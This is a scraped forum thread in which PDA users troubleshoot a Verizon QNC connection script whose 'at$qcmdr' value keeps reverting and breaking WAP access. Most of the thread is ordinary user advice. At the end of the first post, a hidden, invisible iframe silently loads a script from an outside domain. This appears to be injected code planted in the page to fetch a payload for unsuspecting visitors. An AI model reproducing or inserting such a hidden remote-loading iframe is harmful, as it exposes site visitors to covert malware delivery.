+ Reply to Thread
Results 1 to 4 of 4
  1. #1
    Registered User
    Join Date
    12-27-2002
    Posts
    54

    MY QNC script keeps changing...

    ...as we beat this QNC/Express Network thing to death. :smash

    Another quirk I have noticed is that my QNC script keeps changing. I will switch from Express Network to QNC (for WAP) pretty often, but everytime I make an Express Network connection, then want to go back to WAP, the "2" in the first line of the QNC script (Send: at$qcmdr=2) has magically changed back to a "3". This is what renders the QNC connection unusable and then it comes up with the "Error: authentication failure (0x1233)". Then you have to go back into the QNC settings, change the "3" back to a "2", then you *also* have to connect and disconnect with QNC (if not, WAP will try to use Express Network to connect) befroe WAP will work (using the included WAP browser). :complain :complain :complain

    Are others experiencing the same thing? Sorry if this particular quirk has already been discussed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    09-09-2002
    Posts
    463
    bones--I was on EN for two days and cancelled due to performance issues. Anyway, have you created a seperate QNC connection with the correct settings. i created one called Verizon 14.4 with the 3 changed to a 2 like you stated above.

    Also, if you've done any hard resets the two that are in Flash ROM are 1x and QNC and those both have the 3 instead of the 2.

    Once you create a new service connection you should be all set. good luck

    pdageek

  3. #3
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Mine did the same thing but I guess because I'm NOT in an ExpressNetwork area (I am jealous of all of you), it works slow speed.

  4. #4
    Registered User
    Join Date
    12-27-2002
    Posts
    54
    pdageek, I will try that. I was using the QNC one. I will create a different "slow-speed" connection. No way to get rid of the hard coded "1X" and "QNC" entries, are there?

    Also would you care to elaborate on your 1X performance issues? I'm not all that thrilled with its performance on a 33mHz processor, but it zooms on my laptop. Since I haven't fully migrated from the laptop (yet), I'm keeping it (for now).

    (so Beryl, don't be *too* jealous!!)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts